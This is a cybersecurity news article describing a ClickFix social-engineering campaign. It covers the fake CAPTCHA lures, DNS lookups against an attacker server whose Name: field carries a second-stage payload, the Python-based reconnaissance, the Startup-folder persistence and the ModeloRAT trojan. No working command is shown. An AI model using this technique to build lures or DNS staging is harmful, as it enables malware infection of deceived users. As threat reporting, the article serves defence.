A new evolution in the ClickFix social engineering campaign, which now employs a custom DNS hijacking technique to deliver malware.
This attack method tricks users into executing malicious commands that utilize DNS lookups to fetch the next stage of the infection, allowing attackers to bypass traditional detection methods and blend in with normal network traffic.
ClickFix attacks rely on deceiving users through fake error messages, such as bogus CAPTCHA prompts or “fix this issue” notifications on compromised websites.
These lures persuade victims to copy a specific script to their clipboard and paste it into a simplistic system dialog like the Run command or PowerShell.
While previous variants, such as CrashFix, utilized fake browser crashes to create a sense of urgency, this latest iteration focuses on a more technical evasion strategy involving the Domain Name System.
When a victim pastes and runs the initial malicious command, the script utilizes cmd.exe to perform a specific DNS lookup against an attacker-controlled external server rather than the system’s default internet resolver.
The script then parses the output of this request, specifically filtering for the Name: field in the DNS response.
This field does not contain a legitimate server name but instead holds the code for the second-stage payload, which is immediately executed on the victim’s machine.
This technique transforms DNS into a lightweight staging channel. It allows attackers to validate that a target is active before delivering the heavier malware components.
Furthermore, because DNS traffic is ubiquitous in all networks, using it for command and control helps the malicious activity avoid raising alarms.
Microsoft Defender researchers have also observed that once the second stage is triggered by the DNS response, the attack chain downloads a ZIP file containing a portable Python bundle.
The infection process continues by running a malicious Python script capable of performing host and domain reconnaissance.
To maintain access to the compromised system, the malware establishes persistence by dropping a VBScript file and creating a shortcut named MonitoringService.lnk in the Windows Startup folder.
The final payload delivered in this campaign is a Remote Access Trojan (RAT) identified as ModeloRAT. Microsoft Defender Antivirus detects and blocks this activity under the threat signature Trojan:Win32/ClickFix.R!ml.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
